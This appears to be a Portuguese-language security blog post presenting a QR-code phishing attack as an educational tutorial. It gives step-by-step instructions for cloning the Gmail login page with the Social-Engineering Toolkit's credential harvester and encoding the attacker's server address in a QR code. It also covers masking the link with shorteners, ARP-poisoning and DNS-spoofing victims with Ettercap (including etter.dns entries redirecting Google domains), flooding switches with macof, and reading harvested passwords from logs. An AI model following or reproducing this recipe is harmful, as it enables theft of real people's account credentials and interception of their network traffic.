O QR code é um código estruturado em uma imagem que pode ser lida por leitores específicos que revelam seu conteúdo ou executam funções de redirecionamento para páginas e etc. Esta ferramenta que foi criada especialmente para catalogo de peças e gerenciamento de estoque, hoje já é utilizada em vários posteres, cartões de visitas, banners, em manuais, flayers e etc, e por sua popularização, também é fácil de ser burlado para dar vantagens a atacantes e trolls afim de tirar algum proveito do pessoal uma vez que essa leitura e interpretação já se encontra em celulares, tablets e outros Gadgets pessoais. Neste texto irei abordar esse vetor de ataque mostrando possíveis formas de se explorar, seja por phishing enviando a requisição para um server específico ou realizando o DNS Spoof e ARP Poisoning com outras ferramentas.
Iremos realizar o ataque utilizando o setoolkit (Social Engineering Toolkit) . Um framework para ataques de engenharia social muito poderoso que iremos utilizar para clonar sites e colocar o mesmo dentro uma tag NFC e dentro de um QR Code.
Primeiro vamos abrir o Seetoolkit e realizar um clone simples do GMAIL para nosso localhost
# setoolkit 
Selecione na ordem:
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner
Informe o IP da máquina atacante: ex: 192.168.1.56
Informe a URL a ser clonada ex: 'https://accounts.google.com
Se você seguiu todas as configurações que relizamos Neste Post, o site inteiro será clonado para o diretório /var/www/html/
Tente acessar o mesmo pelo localhost pelo browser
http://localhost
Criando o QR Code
Agora vamos colocar a URL do nosso servidor dentro do QR CodeExistem vários métodos de gerar QR Codes, inclusive ferramentas online. Você pode escolher o que você preferir, até mesmo temos uma função dessa dentro do setoolkit. Porém, decidi optar por uma alternativa mais simples para esse post, o qrencode.
# sudo apt-get install qrencode
# qrencode 'http://192.168.1.56' -o qr_atack.png
Caso você esteja em ambientes em que você não tenha acesso direto a rede, e não queria deixar tão na cara assim o ataque, você pode fazer uso de encurtadores de links como bit.ly para apontar para o IP do seu servidor Web fake. Porém podemos lapidar ainda mais essa tecnica com a função de ARP Poisoning do Ettercap caso estejamos na mesma rede do ataque para poisonar o DNS e a tabela ARP do roteador e da vítima, fazendo parecer com autenticidade que somos realmente o servidor escolhido.
Realizando o DNS Spoofing da página alvo
É possível também realizar o spoofing de DNS e ARP do site clonado utilizando uma técnica Man in the Middle com o Ettercap para 'enganar' o gateway e a vítima, fazendo os mesmos pensarem que você é o servidor requisitado, aparecendo até mesmo a url verdadeira do site durante o ataque.Esse processo foi abordado com mais detalhes Neste Post, porém vou dar uma aplicada básica nele aqui, Caso se interesse em se aprofundar mais em explorar esse recurso, sinta-se a vontade. :)
Vamos editar o arquivo de configuração de DNS do Ettercap e e adicionar no final do arquivo as seguintes linhas, alterando somente o seu IP.
# vim /etc/ettercap/etter.dns
#GMAIL SPOOFING
gmail.com A 192.168.1.56
https://accounts.google.com/ A 192.168.1.56
* *.gmail.com A 192.168.1.56
accounts.google.com/ A 192.168.1.56
mail.google.com A 192.168.1.56
~
Configurando o Ettercap
Agora vamos abrir o Ettercap e parametrizar o mesmo para dar continuidade ao ataque:
Na aba Sniff selecione a opção "Unified Sniff"
Na aba Host, selecione a opção "Scan for hosts" ou dê um Ctrl + S para procurar os hosts em sua rede.
Novamente na aba "hosts" selecione a opção "Host List"
Nota:
Caso esteja realizando o ataque de uma rede com Switches, abra um terminal, e como root digite:
# macof
Em seguida clique em "Plugins" e logo após um duplo clique sobre a opção "dns_spoof"
Feito isso, vá até a aba Mitm e selecione "Arp Poisoning" clicando no checkbox "Sniff remote connections" e clique em Ok. Logo após vá na aba "Start" e selecione "Start Sniffing"
Testando o método:
Você pode capturar os posts do Setookit dentro do diretório do apache, com os logs de harvester. Eles estão organizador por data e hora, como você poderá ver conforme progredir com os testes.
# cat /var/www/html/harvester_2016-01-07\ 23\:46\:29.762995.txt
Lembrando que este artigo tem intuito educativo para profissionais e estudantes de Segurança da Informação. Não nos responsabilizamos pelo uso errado das técnicas aprendidas aqui.
Os próximos posts serão abordando essa exploração em Tags NFC e Beacons da Google para mostrar vetores mais recentes desse material.
:)
hhhh
ResponderExcluir